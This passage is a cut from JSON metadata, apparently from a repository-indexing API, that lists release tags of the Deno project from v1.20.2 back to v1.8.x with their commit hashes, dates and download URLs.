1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"http